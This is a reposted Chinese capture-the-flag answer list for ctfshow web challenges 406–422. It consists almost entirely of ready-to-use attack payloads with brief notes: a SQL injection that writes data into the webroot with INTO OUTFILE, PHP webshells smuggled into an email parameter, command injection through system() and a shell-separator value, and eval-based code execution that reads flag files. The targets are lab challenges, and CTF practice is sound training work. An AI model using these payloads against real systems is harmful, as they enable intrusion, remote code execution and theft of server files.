标签:web code nl show ctf 406 flag ctfshow php
406
http://www.baidu.com;'union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23
407
?ip=cafe::add
ip6地址,类的名字叫cafe都是16进制
408
?email="<?php eval($_POST[1]);?>"@123.php
409
注意这个是可以成功eval的,他把双引号前看做一个php脚本
?email="flageval($_POST[1]);?>"@123.com
410
?b=on
411
?b=yes
412
ctfshow=<?php system('cat flag.php')?>
这不是注释符号,直接传即可,注意追加的,错了重开环境
413
ctfshow=*/system('cat flag.php');/*
414
/?ctfshow=-1
415
?k=Getflag
416
?f[0]=ctf&f[1]=flag
或者
f=ctf::flag
417
?ctf=show
418
拖到最下面还有内容
die=0&clear=;cp flag.php test.txt
变量覆盖
419
code=eval($_GET[1]);
或者
code=echo `tac fl*`;
420
code=nl ../*
421
nl f*
422
nl *
标签:web,code,nl,show,ctf,406,flag,ctfshow,php 来源: https://www.cnblogs.com/aninock/p/16212123.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。